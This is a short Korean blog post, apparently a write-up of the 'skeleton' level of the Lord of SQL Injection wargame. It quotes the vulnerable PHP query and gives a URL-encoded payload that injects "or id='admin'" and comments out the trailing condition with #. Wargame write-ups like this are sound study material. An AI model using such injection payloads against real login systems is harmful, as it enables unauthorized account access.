Notice
Recent Posts
Recent Comments
Link
«   2025/07   »
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

Un_Woo

LOS skeleton 본문

Web/Lord of Sql Ingection

LOS skeleton

언우s 2018. 4. 11. 09:48

10. skeleton

$query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0"; 

1=0 때문에 무조건 false
if($result['id'] == 'admin') solve("skeleton"); 

id=admin이어야 함

1=0 #으로 주석 처리

?pw=%27%20or%20id=%27admin%27%23

'Web > Lord of Sql Ingection' 카테고리의 다른 글

LOS darkknight  (0) 2018.04.11
LOS golem  (0) 2018.04.11
LOS vampire  (0) 2018.04.11
LOS troll  (0) 2018.04.11
LOS orge  (0) 2018.04.11
Comments